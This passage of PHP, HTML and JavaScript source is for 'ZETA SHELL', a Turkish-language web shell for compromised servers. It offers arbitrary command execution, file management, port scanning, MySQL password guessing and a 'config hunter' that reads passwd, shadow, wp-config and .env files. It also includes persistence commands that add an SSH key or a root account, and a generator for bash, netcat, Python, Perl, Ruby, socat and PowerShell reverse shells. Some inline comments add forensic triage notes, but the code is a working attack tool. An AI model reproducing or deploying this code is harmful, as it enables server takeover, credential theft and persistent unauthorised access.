echo '<div class="form-section flex-item" style="padding: 8px 12px; margin-top: 0;"><h4><i class="fas fa-search"></i> Ara</h4><form method="post" style="margin-bottom:0;"><div class="flex-container" style="margin-bottom:0;"><div class="flex-item"><input type="text" name="search_term" placeholder="Dosya/Dizin adı..." value="'.(isset($_POST['search_term']) ? htmlspecialchars($_POST['search_term']) : '').'" required style="padding: 4px 6px; font-size:0.8em;"></div><div style="flex-grow: 0;"><button type="submit" class="action-btn" name="search_files" style="padding: 4px 8px; font-size:0.8em;"><i class="fas fa-search"></i> Ara</button></div></div></form></div>';
echo '</div>';
// Arama Sonuçları
if(isset($_POST['search_files']) && !empty($action_result_output)) {
echo '<details class="collapsible-section" open><summary><i class="fas fa-poll-h"></i> Arama Sonuçları</summary><div><pre class="info-output">'.$action_result_output.'</pre></div></details>';
}
// Dosya Listeleme Tablosu
if (!is_dir(PATH)) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin değil!</div>'; }
elseif (!is_readable(PATH)) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: Dizin okunamıyor! (' . htmlspecialchars(PATH) . ')</div>'; }
elseif (!($scan = @scandir(PATH))) { echo '<div class="message error"><i class="fas fa-exclamation-triangle"></i> Hata: scandir başarısız!</div>'; }
else {
$folders = array(); $files = array(); foreach ($scan as $obj) { if ($obj == '.' || $obj == '..') continue; $full_obj_path = PATH . '/' . $obj; if (@is_dir($full_obj_path)) { array_push($folders, $obj); } else { array_push($files, $obj); } } usort($folders, 'strcoll'); usort($files, 'strcoll');
echo '<div style="overflow-x: auto;">';
echo '<table class="hacker-table"><thead><tr><th class="col-name">Adı</th><th class="col-type">Tür</th><th class="col-perms">İzinler</th><th class="col-actions">Eylemler</th></tr></thead><tbody>';
foreach ($folders as $folder) { $folder_path = PATH . "/" . $folder; $perms = @fileperms($folder_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $perms_readable = perms_to_string($perms); $folder_encoded_name = htmlspecialchars($folder); $folder_encoded_url_p = urlencode(encodePath($folder_path)); $folder_encoded_url_f = urlencode($folder); $path_encoded_url = urlencode(encodePath(PATH)); echo "<tr><td class='col-name'>" . fileIcon($folder) . "<a href='?p=" . $folder_encoded_url_p . "'>" . $folder_encoded_name . "</a></td><td class='cell-type'>[DIR]</td><td class='cell-perms'><a href='#' class='perms' title='" . $perms_readable . "' onclick='promptChmod("" . $folder_encoded_name . "", "" . $perms_str . ""); return false;'>" . $perms_str . "</a></td><td class='action-buttons-cell'>"; echo "<a title='Düzenle' href='#' onclick='alert("Klasör düzenlenemez!"); return false;'><i class='fas fa-file-pen action-icon-edit' style='opacity:0.3;'></i></a>"; echo "<a title='Yeniden Adlandır' href='?r=1&file=" . $folder_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-edit action-icon-rename'></i></a>"; echo "<form method='post' onsubmit='return confirm("Sil: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><button type='submit' name='delete_item' title='Sil'><i class='fas fa-trash action-icon-delete'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("ZIP Arşivle: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='archive_type' value='zip'><button type='submit' name='archive_item' title='ZIP'><i class='fas fa-file-archive action-icon-archive'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("TAR.GZ Arşivle: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . 
"'><input type='hidden' name='archive_type' value='tar'><button type='submit' name='archive_item' title='TAR.GZ'><i class='fas fa-file-zipper action-icon-archive'></i></button></form>"; echo "<span class='separator'>|</span>"; echo "<a title='Kilitle (0444)' href='#' onclick='promptChmod("" . $folder_encoded_name . "", "0444", true); return false;'><i class='fas fa-lock action-icon-lock'></i></a>"; echo "<a title='Aç (0755)' href='#' onclick='promptChmod("" . $folder_encoded_name . "", "0755", true); return false;'><i class='fas fa-unlock action-icon-unlock'></i></a>"; echo "<span class='separator'>|</span>"; echo "<form method='post' onsubmit='return confirm("chattr +i: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='attr_action' value='lock'><button type='submit' name='chattr_item' title='+i'><i class='fas fa-anchor action-icon-chattr-plus'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("chattr -i: " . $folder_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $folder_encoded_name . "'><input type='hidden' name='attr_action' value='unlock'><button type='submit' name='chattr_item' title='-i'><i class='fas fa-unlink action-icon-chattr-minus'></i></button></form>"; echo "</td></tr>"; }
foreach ($files as $file) { $file_path = PATH . "/" . $file; $perms = @fileperms($file_path); $perms_str = ($perms === false) ? '????' : substr(sprintf('%o', $perms), -4); $size = @filesize($file_path); $size_str = ($size === false) ? '???' : formatSizeUnits($size); $perms_readable = perms_to_string($perms); $file_encoded_name = htmlspecialchars($file); $file_encoded_url_f = urlencode($file); $path_encoded_url = urlencode(encodePath(PATH)); $file_ext = fileExtension($file); $is_archive = in_array($file_ext, array("zip", "tar", "gz", "tgz", "bz2", "tbz2", "rar")); $is_readable = is_readable($file_path); echo "<tr><td class='col-name'>" . fileIcon($file) . $file_encoded_name . " <small>(".$size_str.")</small></td><td class='cell-type'>" . ($file_ext ?: '-') . "</td><td class='cell-perms'><a href='#' class='perms' title='" . $perms_readable . "' onclick='promptChmod("" . $file_encoded_name . "", "" . $perms_str . ""); return false;'>" . $perms_str . "</a></td><td class='action-buttons-cell'>"; if ($is_readable) { echo "<a title='Düzenle/Görüntüle' href='?e=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-file-pen action-icon-edit'></i></a>"; } else { echo "<a title='Okunamıyor!' href='#' onclick='alert("Okunamıyor!");'><i class='fas fa-file-pen action-icon-edit' style='opacity:0.3;'></i></a>"; } echo "<a title='Yeniden Adlandır' href='?r=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . "'><i class='fas fa-edit action-icon-rename'></i></a>"; echo "<form method='post' onsubmit='return confirm("Sil: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><button type='submit' name='delete_item' title='Sil'><i class='fas fa-trash action-icon-delete'></i></button></form>"; if ($is_readable) { echo "<a title='İndir' href='?dl=1&file=" . $file_encoded_url_f . "&p=" . $path_encoded_url . 
"' target='_blank'><i class='fas fa-download action-icon-download'></i></a>"; } else { echo "<a title='İndirilemez!' href='#' onclick='alert("İndirilemez!");'><i class='fas fa-download action-icon-download' style='opacity:0.3;'></i></a>"; } if ($is_archive) { echo "<form method='post' onsubmit='return confirm("Aç: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><button type='submit' name='extract_item' title='Aç'><i class='fas fa-box-open action-icon-extract'></i></button></form>"; } echo "<span class='separator'>|</span>"; echo "<a title='Kilitle (0444)' href='#' onclick='promptChmod("" . $file_encoded_name . "", "0444", true); return false;'><i class='fas fa-lock action-icon-lock'></i></a>"; echo "<a title='Aç (0644)' href='#' onclick='promptChmod("" . $file_encoded_name . "", "0644", true); return false;'><i class='fas fa-unlock action-icon-unlock'></i></a>"; echo "<span class='separator'>|</span>"; echo "<form method='post' onsubmit='return confirm("chattr +i: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><input type='hidden' name='attr_action' value='lock'><button type='submit' name='chattr_item' title='+i'><i class='fas fa-anchor action-icon-chattr-plus'></i></button></form>"; echo "<form method='post' onsubmit='return confirm("chattr -i: " . $file_encoded_name . "?")'><input type='hidden' name='item_name' value='" . $file_encoded_name . "'><input type='hidden' name='attr_action' value='unlock'><button type='submit' name='chattr_item' title='-i'><i class='fas fa-unlink action-icon-chattr-minus'></i></button></form>"; echo "</td></tr>"; }
echo "</tbody></table>";
echo '</div>';
}
} // show_file_manager sonu
?>
<!-- Açılır/Kapanır Bölümler (DEĞİŞİKLİK YOK) -->
<details id="command" class="collapsible-section" <?php echo ($opened_details == 'command') ? 'open' : ''; ?>> <summary><i class="fas fa-terminal"></i> Komut Çalıştır</summary> <div> <div class="quick-cmd-buttons"> <button class="quick-cmd-btn" onclick="setCmd('whoami')">whoami</button> <button class="quick-cmd-btn" onclick="setCmd('id')">id</button> <button class="quick-cmd-btn" onclick="setCmd('uname -a')">uname -a</button> <button class="quick-cmd-btn" onclick="setCmd('ps aux')">ps aux</button> <button class="quick-cmd-btn" onclick="setCmd('netstat -tulnp')">netstat</button> <button class="quick-cmd-btn" onclick="setCmd('pwd')">pwd</button> <button class="quick-cmd-btn" onclick="setCmd('ls -la')">ls -la</button> <button class="quick-cmd-btn" onclick="setCmd('find / -name *.log 2>/dev/null | head')">*.log bul</button> <button class="quick-cmd-btn" onclick="setCmd('grep -R "password" /var/www/ 2>/dev/null | head')">grep "pass"</button> <button class="quick-cmd-btn" onclick="setCmd('sudo -l')">sudo -l</button> </div> <form method="post"> <div class="flex-container"> <div class="flex-item"> <input type="text" id="command_input" name="command" placeholder="Komutu gir..." value="<?php echo isset($_POST['command']) ? htmlspecialchars($_POST['command']) : ''; ?>" required> </div> <div style="flex-grow: 0;"> <button type="submit" name="run_command" class="action-btn"><i class="fas fa-bolt"></i> Çalıştır!</button> </div> </div> </form> <?php if ($opened_details == 'command'): ?><h4>Çıktı:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> </details>
<details id="system" class="collapsible-section" <?php echo ($opened_details == 'system') ? 'open' : ''; ?>> <summary><i class="fas fa-cogs"></i> Sistem Bilgileri & Analiz</summary> <div> <div class="content-section" style="margin-top:0;"><h4><i class="fas fa-info-circle"></i> Temel Bilgiler</h4><pre class="info-output"><?php echo "<b>Sistem:</b> " . php_uname() . "n"; echo "<b>Server:</b> " . htmlspecialchars($_SERVER['SERVER_SOFTWARE']) . "n"; echo "<b>PHP:</b> " . PHP_VERSION . " <a href='?phpinfo=1&p=".urlencode(encodePath(PATH))."' target='_blank' title='phpinfo() göster'>[phpinfo]</a>" . "n"; echo "<b>User:</b> " . runCommand('whoami')['output'] . " (" . runCommand('id')['output'] . ")n"; $open_basedir = ini_get('open_basedir'); echo "<b>open_basedir:</b> " . ($open_basedir ? htmlspecialchars($open_basedir) : 'Yok (ÖZGÜR!)') . "n"; echo "<b>Disable Funcs:</b> " . (ini_get('disable_functions') ? htmlspecialchars(ini_get('disable_functions')) : 'Yok') . "n";?></pre><?php if(isset($_GET['phpinfo'])) { echo '<div style="max-height: 400px; overflow:auto; border: 1px solid #333; padding:10px; background: #fff; color: #000;">'; @phpinfo(); echo '</div>'; } ?></div> <div class="content-section"><h4><i class="fas fa-microchip"></i> Kaynaklar</h4><pre class="info-output"><?php echo "<b>Disk:</b>n" . runCommand('df -h')['output'] . "nn"; echo "<b>Bellek:</b>n" . runCommand('free -h')['output'] . 
"n";?></pre></div> <div class="form-section"><h4><i class="fas fa-search"></i> Analiz</h4><form method="post" style="display:inline-block;"><button type="submit" name="analyze_system" class="action-btn"><i class="fas fa-vial"></i> Analiz Et!</button></form><?php if ($opened_details == 'system'): ?><h5>Sonuç:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><p><a href="https://www.exploit-db.com/" target="_blank" class="action-btn">Exploit-DB</a> <a href="https://gtfobins.github.io/" target="_blank" class="action-btn">GTFOBins</a></p><?php endif; ?></div> </div> </details>
<details id="network" class="collapsible-section" <?php echo ($opened_details == 'network') ? 'open' : ''; ?>> <summary><i class="fas fa-network-wired"></i> Ağ Araçları</summary> <div> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-route"></i> Ping / Traceroute</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="Hedef IP/Domain..." required></div><div style="flex-grow: 0;"><select name="network_tool"><option value="ping">Ping</option><option value="traceroute">Traceroute</option></select></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" class="action-btn"><i class="fas fa-paper-plane"></i> Gönder</button></div></div></form></div> <div class="form-section"><h4><i class="fas fa-door-open"></i> Port Tara (fsockopen)</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="Hedef IP/Domain..." required></div><div class="flex-item-small"><input type="text" name="network_ports" placeholder="Portlar (örn: 80,443)"></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" value="portscan_fsockopen" class="action-btn"><i class="fas fa-binoculars"></i> Tara</button></div></div><small>Boş bırakırsan yaygın portları dener.</small></form></div> <div class="form-section"><h4><i class="fas fa-cloud-download-alt"></i> cURL İstek</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="network_target" placeholder="URL (örn: https://example.com)" required></div><div style="flex-grow: 0;"><button type="submit" name="run_network_tool" value="curl_req" class="action-btn"><i class="fas fa-cloud-download-alt"></i> Getir</button></div></div></form></div> <?php if ($opened_details == 'network'): ?><h4>Sonuç:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?> <div class="content-section"><h4><i 
class="fas fa-list-alt"></i> Aktif Bağlantılar</h4><pre class="info-output"><?php echo runCommand('netstat -tulnp')['output']; ?></pre></div> </div> </details>
<details id="database" class="collapsible-section" <?php echo ($opened_details == 'database') ? 'open' : ''; ?>> <summary><i class="fas fa-database"></i> Veritabanı (MySQL)</summary> <div> <?php if (!function_exists('mysqli_connect')): ?><div class="message error"><i class="fas fa-times-circle"></i> Hata: PHP MySQLi yok!</div><?php else: ?> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-plug"></i> Bağlan & Sorgula</h4><form method="post"><div class="flex-container"><div class="flex-item-small"><input type="text" name="db_host" placeholder="Host" value="localhost"></div><div class="flex-item-small"><input type="text" name="db_user" placeholder="User"></div><div class="flex-item-small"><input type="password" name="db_pass" placeholder="Pass"></div><div class="flex-item-small"><input type="text" name="db_name" placeholder="DB Name"></div></div><textarea name="db_query" placeholder="SQL Sorgusu..." style="height: 100px;">SHOW DATABASES;</textarea><button type="submit" name="run_db_query" class="action-btn"><i class="fas fa-play"></i> Çalıştır</button></form></div> <?php if ($opened_details == 'database'): ?><h4>Sonuç:</h4><pre class="command-output"><?php echo $action_result_output; ?></pre><?php endif; ?><?php endif; ?> </div> </details>
<details id="dbcheck" class="collapsible-section" <?php echo ($opened_details == 'dbcheck') ? 'open' : ''; ?>> <summary><i class="fas fa-key"></i> DB Cred Checker (MySQL)</summary> <div> <div class="form-section" style="margin-top:0;"><h4><i class="fas fa-search"></i> Yaygın Şifreleri Dene</h4><form method="post"><div class="flex-container"><div class="flex-item"><input type="text" name="db_host_check" placeholder="Host IP / Domain" value="127.0.0.1"></div><div style="flex-grow: 0;"><button type="submit" name="check_db_creds" class="action-btn"><i class="fas fa-key"></i> Dene!</button></div></div></form></div> <?php if ($opened_details == 'dbcheck'): ?><h4>Check Sonucu:</h4><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> </details>
<details id="pwn" class="collapsible-section" <?php echo ($opened_details == 'pwn') ? 'open' : ''; ?>> <summary><i class="fas fa-user-secret"></i> Pwn / Kalıcılık Yardımcısı</summary> <div> <div class="content-section" style="margin-top:0;"><h4><i class="fas fa-question-circle"></i> Yetki Yükseltme Kontrolleri</h4> <button class="quick-cmd-btn" onclick="setCmd('sudo -l')">sudo -l</button> <button class="quick-cmd-btn" onclick="setCmd('find / -perm -4000 -type f -ls 2>/dev/null')">SUID Bul</button> <button class="quick-cmd-btn" onclick="setCmd('find / -perm -2000 -type f -ls 2>/dev/null')">SGID Bul</button> <a href="https://gtfobins.github.io/" target="_blank"><button class="quick-cmd-btn">GTFOBins</button></a> </div> <div class="content-section"><h4><i class="fas fa-link"></i> Kalıcılık Komutları (DİKKAT!)</h4> <p><small>Aşağıdaki komutları Kopyala/Yapıştır ile Komut Çalıştır bölümünde kullanabilirsin (Yetki gerektirir!).</small></p> <b>SSH Key Ekle:</b><br><pre style="font-size:0.75em;">mkdir -p ~/.ssh && echo "SENIN_SSH_PUBLIC_KEY_BURAYA" >> ~/.ssh/authorized_keys && chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys</pre> <b>Yeni User Ekle (passwd/shadow):</b><br><pre style="font-size:0.75em;"># 1. Adım: Şifre Hash'i Oluştur (örn: openssl passwd -1 'YENISIFRE')
# echo 'yenikullanici:HASH_BURAYA:0:0:root:/root:/bin/bash' >> /etc/passwd
# echo 'yenikullanici:HASH_BURAYA:19800:0:99999:7:::' >> /etc/shadow</pre> </div> </div> </details>
<details id="helpers" class="collapsible-section" <?php echo ($opened_details == 'helpers') ? 'open' : ''; ?>> <summary><i class="fas fa-tools"></i> Yardımcı Araçlar</summary> <div> <div class="content-section" style="margin-top:0;"> <h4><i class="fas fa-key"></i> Config Avcısı</h4> <form method="post"> <div class="quick-cmd-buttons"> <?php $common_configs_keys = array('passwd','shadow','wpconfig','wpconfig_up','env','env_up','apache_conf','nginx_conf','php_ini','my_cnf','sshd_config'); foreach ($common_configs_keys as $key) { ?> <button type="submit" name="read_config_post" value="<?php echo htmlspecialchars($key); ?>" class="config-btn" title="/path/to/<?php echo htmlspecialchars($key); ?>"><?php echo htmlspecialchars($key); ?></button> <?php } ?> <input type="hidden" name="config_file_key" id="config_file_key_hidden"> </div> </form> <?php if ($opened_details == 'helpers' && isset($_POST['read_config_post'])): ?><h5>Config İçeriği:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?> </div> <div class="content-section"><h4><i class="fas fa-satellite-dish"></i> Reverse Shell</h4><form onsubmit="generateShell(event)"><div class="flex-container"><div class="flex-item-small">IP: <input type="text" id="rev_ip" value="<?php echo htmlspecialchars($_SERVER['REMOTE_ADDR']); ?>"></div><div class="flex-item-small">Port: <input type="text" id="rev_port" value="4444"></div><div class="flex-item">Type: <select id="shell_type"><option value="bash_tcp">Bash</option><option value="nc_e">NC -e</option><option value="nc_mkfifo">NC mkfifo</option><option value="python3">Py3</option><option value="php">PHP</option><option value="perl">Perl</option><option value="ruby">Ruby</option><option value="socat">Socat</option><option value="powershell">PS</option></select></div><div style="flex-grow: 0;"><button type="submit" class="action-btn"><i class="fas fa-cogs"></i> Üret</button></div></div><pre id="generated_shell_output" class="command-output" 
style="margin-top:10px; display:none;"></pre></form></div> <div class="content-section"><h4><i class="fas fa-retweet"></i> Encode/Decode & Hash</h4><form method="post"><textarea name="helper_input" placeholder="Metin..." style="height: 60px;"><?php echo isset($_POST['helper_input']) ? htmlspecialchars($_POST['helper_input']) : ''; ?></textarea><div class="quick-cmd-buttons"><button type="submit" name="run_helper_tool" value="base64_encode" class="action-btn">B64 Enc</button><button type="submit" name="run_helper_tool" value="base64_decode" class="action-btn">B64 Dec</button><button type="submit" name="run_helper_tool" value="url_encode" class="action-btn">URL Enc</button><button type="submit" name="run_helper_tool" value="url_decode" class="action-btn">URL Dec</button><button type="submit" name="run_helper_tool" value="md5" class="action-btn">MD5</button><button type="submit" name="run_helper_tool" value="sha1" class="action-btn">SHA1</button></div></form><?php if ($opened_details == 'helpers' && isset($_POST['run_helper_tool'])): ?><h5>Sonuç:</h5><pre class="info-output"><?php echo $action_result_output; ?></pre><?php endif; ?></div> </div> </details>
<!-- Footer -->
<div class="hacker-footer">
<p>~~ ZETA SHELL <?php echo $SHELL_VERSION; ?> coded by <span>NESAS_0DAY</span> ~~</p>
<p><a href="https://instagram.com/arobinks" target="_blank"><i class="fab fa-instagram"></i> Instagram: arobinks</a></p>
</div>
</div> <!-- container-fluid sonu -->
<!-- Gizli Formlar -->
<form method="post" id="renameForm" class="hidden-form"><input type="hidden" name="original_name" id="rename_original_name"><input type="text" name="new_name" id="rename_new_name" required><button type="submit" name="rename">Rename!</button></form>
<form method="post" id="chmodForm" class="hidden-form"><input type="hidden" name="item_name" id="chmod_item_name"><input type="text" name="new_perm" id="chmod_new_perm" pattern="[0-7]{3,4}" required><button type="submit" name="chmod_item">Chmod!</button></form>
<!-- Müzik Çalar -->
<audio id="hackerAudio" loop>
<!-- !!! ALPHA: Buradaki src'yi gerçek müzik dosyanın URL'si veya yolu ile değiştir !!! -->
<source src="https://github.com/noxebey/satana/raw/main/satana.mp3" type="audio/mpeg">
Tarayıcın sesi desteklemiyor.
</audio>
<script>
// --- ZETA SHELL v13.1 JavaScript ---
var typed = new Typed('#shell-title', { strings: ['NESAS ZETA SHELL <?php echo $SHELL_VERSION; ?>', 'ZETA SHELL ACTIVE', 'NESAS_0DAYWAS HERE^1000'], typeSpeed: 40, backSpeed: 25, loop: true, showCursor: true, cursorChar: '_', smartBackspace: true });
// Page-load handler for the shell's operator UI: fades out the status banner,
// re-opens the panel that produced the last result, and scrolls to the
// edit/rename form when the query string asks for one. It only touches the DOM
// and sends no request of its own.
document.addEventListener('DOMContentLoaded', function() {
// First element with class "message" (the status banner), if one was rendered.
const messageDiv = document.querySelector('.message');
// After 5 s set opacity to 0; a further 5 s later remove it from layout.
if(messageDiv) { setTimeout(() => { messageDiv.style.opacity = '0'; setTimeout(() => messageDiv.style.display = 'none', 5000); }, 5000); }
// The server writes $opened_details straight into this string literal with no
// escaping at this point. Where the variable is assigned is outside this excerpt.
// NOTE(review): confirm it only ever holds a fixed panel id (command, system,
// network, database, dbcheck, pwn, helpers) and never request-derived text.
const detailToOpenId = '<?php echo $opened_details; ?>';
// Open the matching <details> element and bring it into view.
if(detailToOpenId) { const detailToOpen = document.getElementById(detailToOpenId); if(detailToOpen) { detailToOpen.open = true; detailToOpen.scrollIntoView({behavior: "smooth", block: "start"}); } }
// Neither the #editFormContainer element nor the rename section is rendered in
// this excerpt; both lookups may return null/undefined and are guarded below.
const editForm = document.getElementById('editFormContainer');
const renameForm = document.querySelector('.form-section h3 i.fa-edit')?.closest('.form-section');
// "e=1" / "r=1" are the query flags used by the edit and rename links in the file table.
if (editForm && window.location.search.includes('e=1')) { editForm.scrollIntoView({behavior: "smooth", block: "center"}); }
else if (renameForm && window.location.search.includes('r=1')) { renameForm.scrollIntoView({behavior: "smooth", block: "center"}); }
});
// Converts an octal permission string into an "ls -l"-style text such as
// "urwxr-xr-x (0755)".
//   permsOctalStr: octal digits as text; an empty value or '????' yields 'Unknown',
//                  a value parseInt cannot read as base 8 yields 'Invalid'.
//   returns:       one type character, nine permission characters, then the
//                  original string in parentheses.
// The first character is chosen from the file-type bits (0x1000 and above). The
// file table renders only the last four octal digits, so for those inputs the
// parsed value is below 0x1000, no type test matches, and the type character is 'u'.
// Setuid/setgid/sticky (0x0800/0x0400/0x0200) are folded into the execute columns.
function perms_to_string_js(permsOctalStr) { if (!permsOctalStr || permsOctalStr === '????') return 'Unknown'; const perms = parseInt(permsOctalStr, 8); if (isNaN(perms)) return 'Invalid'; let info = ''; if ((perms & 0xC000) === 0xC000) info = 's'; else if ((perms & 0xA000) === 0xA000) info = 'l'; else if ((perms & 0x8000) === 0x8000) info = '-'; else if ((perms & 0x6000) === 0x6000) info = 'b'; else if ((perms & 0x4000) === 0x4000) info = 'd'; else if ((perms & 0x2000) === 0x2000) info = 'c'; else if ((perms & 0x1000) === 0x1000) info = 'p'; else info = 'u'; info += ((perms & 0x0100) ? 'r' : '-'); info += ((perms & 0x0080) ? 'w' : '-'); info += ((perms & 0x0040) ? ((perms & 0x0800) ? 's' : 'x' ) : ((perms & 0x0800) ? 'S' : '-')); info += ((perms & 0x0020) ? 'r' : '-'); info += ((perms & 0x0010) ? 'w' : '-'); info += ((perms & 0x0008) ? ((perms & 0x0400) ? 's' : 'x' ) : ((perms & 0x0400) ? 'S' : '-')); info += ((perms & 0x0004) ? 'r' : '-'); info += ((perms & 0x0002) ? 'w' : '-'); info += ((perms & 0x0001) ? ((perms & 0x0200) ? 't' : 'x' ) : ((perms & 0x0200) ? 'T' : '-')); return info + ' (' + permsOctalStr + ')'; }
// Overwrite the tooltip of every rendered ".perms" link with the client-side
// rendering of its visible text (this replaces the title written by the server).
document.querySelectorAll('.perms').forEach(el => { el.title = perms_to_string_js(el.textContent); });
// Pre-fills the command box (#command_input) with `cmd`, focuses it, and opens
// and scrolls to the "command" panel. Nothing is sent to the server here: the
// text goes out only when the operator submits the surrounding form, which posts
// the fields "command" and "run_command". The server-side handler for that POST
// is outside this excerpt.
// Triage note: POST requests to this script carrying a "command" field are the
// strongest indicator of interactive use of the shell.
function setCmd(cmd) { const cmdInput = document.getElementById('command_input'); cmdInput.value = cmd; cmdInput.focus(); document.getElementById('command').open = true; document.getElementById('command').scrollIntoView({behavior: "smooth", block: "start"}); }
// Asks the operator for a new permission mode for `itemName` and submits the
// hidden #chmodForm.
//   itemName:     entry name as rendered in the file table.
//   currentPerms: value pre-filled in the prompt (current mode or a preset
//                 such as "0444" / "0755" / "0644").
//   submitNow:    when true, skips the extra confirm() step.
// Input is accepted only if it is 3 or 4 octal digits; any other non-cancelled
// input shows an error alert. On acceptance the fields "item_name" and
// "new_perm" are filled and the form is posted to the same script. The
// server-side chmod handler is outside this excerpt.
function promptChmod(itemName, currentPerms, submitNow = false) { const newPerms = prompt("Yeni izin (örn: 0755) [" + itemName + "]:", currentPerms); if (newPerms !== null && /^[0-7]{3,4}$/.test(newPerms)) { document.getElementById('chmod_item_name').value = itemName; document.getElementById('chmod_new_perm').value = newPerms; if (submitNow || confirm(itemName + " -> " + newPerms + " ?")) { document.getElementById('chmodForm').submit(); } } else if (newPerms !== null) { alert("Geçersiz format!"); } }
// Click handler for the "config hunter" buttons: cancels the default submit,
// copies the clicked button's value (one of the keys listed in the form, e.g.
// passwd, shadow, wpconfig, env, sshd_config) into the hidden input
// #config_file_key_hidden (field name "config_file_key"), then submits the
// form from script. How the server maps a key to a file path is outside this
// excerpt.
// Triage note: a POST carrying "config_file_key" indicates an attempt to read
// one of those credential or configuration files. Treat secrets stored in any
// file that was readable by the web-server user as exposed.
document.querySelectorAll('.config-btn').forEach(button => { button.addEventListener('click', function(event) { event.preventDefault(); document.getElementById('config_file_key_hidden').value = this.value; this.closest('form').submit(); }); });
function generateShell(event) { event.preventDefault(); const ip = document.getElementById('rev_ip').value; const port = document.getElementById('rev_port').value; const type = document.getElementById('shell_type').value; let command = ''; if (!ip || !port) { alert('IP ve Port gir!'); return; } switch(type) { case 'bash_tcp': command = `bash -i >& /dev/tcp/${ip}/${port} 0>&1`; break; case 'nc_e': command = `nc -e /bin/bash ${ip} ${port}`; break; case 'nc_mkfifo': command = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ${ip} ${port} >/tmp/f`; break; case 'python3': command = `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'`; break; case 'php': command = `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/bash -i <&3 >&3 2>&3");'`; break; case 'perl': command = `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`; break; case 'ruby': command = `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'`; break; case 'socat': command = `socat tcp-connect:${ip}:${port} exec:/bin/bash,pty,stderr,setsid,sigint,sane`; break; case 'powershell': command = `$client = New-Object System.Net.Sockets.TCPClient("${ip}",${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`; break; default: command = 
'Bilinmeyen tür'; } const outputArea = document.getElementById('generated_shell_output'); outputArea.textContent = command; outputArea.style.display = 'block'; try { navigator.clipboard.writeText(command).then(() => alert('Komut kopyalandı!'), () => alert('Kopyalanamadı!')); } catch (err) { alert('Kopyalama hatası!'); } }
const audioPlayer = document.getElementById('hackerAudio'); const musicButton = document.getElementById('musicButton'); let isPlaying = false; audioPlayer.volume = 0.2;
musicButton.addEventListener('click', () => { if (isPlaying) { audioPlayer.pause(); musicButton.textContent = '🎵'; musicButton.style.filter = 'grayscale(80%)'; } else { audioPlayer.play().catch(e => console.error("Müzik hatası:", e)); musicButton.textContent = '⏸️'; musicButton.style.filter = 'none'; } isPlaying = !isPlaying; });
// --- AJAX ve Download İşlemleri için PHP blokları ---
<?php
// File-read endpoint: when the query string carries ajax_get_content, file and p,
// the script answers with a JSON object and stops.
//   p    - directory, passed through decodePath() (defined outside this excerpt)
//   file - file name, URL-decoded and appended to the directory
// Response: {"success": false, "error": ...} when the path is missing, is not a
// regular file, is unreadable, or the read fails; otherwise
// {"success": true, "filename": ..., "content": ...}, with the content converted
// to UTF-8 (source encoding detected among UTF-8, ISO-8859-9 and ISO-8859-1).
// Nothing in this block limits the resulting path to a base directory, so any
// file readable by the PHP process can be returned. Whether the login check has
// run before this point cannot be seen from this excerpt - TODO confirm.
// Triage note: access-log entries for this script whose query string contains
// "ajax_get_content" record which files were read. The path sits in "p" (encoded
// by the shell's own encodePath) and the name in "file".
